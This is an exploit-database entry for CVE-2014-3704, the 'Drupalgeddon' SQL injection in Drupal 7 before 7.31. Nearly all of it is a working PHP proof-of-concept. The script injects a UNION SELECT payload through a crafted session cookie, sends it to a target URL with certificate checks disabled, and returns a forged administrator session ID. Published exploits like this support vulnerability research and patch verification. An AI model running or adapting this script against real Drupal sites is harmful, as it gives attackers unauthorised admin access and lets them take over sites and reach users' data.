Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)



EKU-ID: 7483 CVE: 2014-3704 OSVDB-ID:
Author: Stefan Horst Published: 2018-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?php
//    _____      __   __  _             _______
//   / ___/___  / /__/ /_(_)___  ____  / ____(_)___  _____
//   \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
//  ___/ /  __/ ,< / /_/ / /_/ / / / / /___/ / / / (__  )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
//·
 
include 'common.inc';
include 'password.inc';
 
// set values
$user_name = 'admin';
 
$url = isset($argv[1])?$argv[1]:'';
$user_id = isset($argv[2])?intval($argv[2]):1;
 
if ($url == '-h') {
      echo "usage:\n";
      echo $argv[0].' $url [$user_id]'."\n";
      die();
}
 
if (empty($url) || strpos($url,'https') === False) {
      echo "please state the cookie url. It works only with https urls.\n";
      die();
}
 
if (strpos($url, 'www.') === 0) {
      $url = substr($url, 4);
}
 
$url = rtrim($url,'/');
 
list( , $session_name) = explode('://', $url, 2);
 
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
 
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
 
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- ";
 
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
 
// send the request to the server
$ch = curl_init($url);
 
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
 
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
      'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Accept-Language: en-US,en;q=0.5'
));
 
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
 
$output = curl_exec($ch);
 
curl_close($ch);
 
echo "Session with this ID created:\n";
echo "S".$cookieName.": ".$sec_ssid;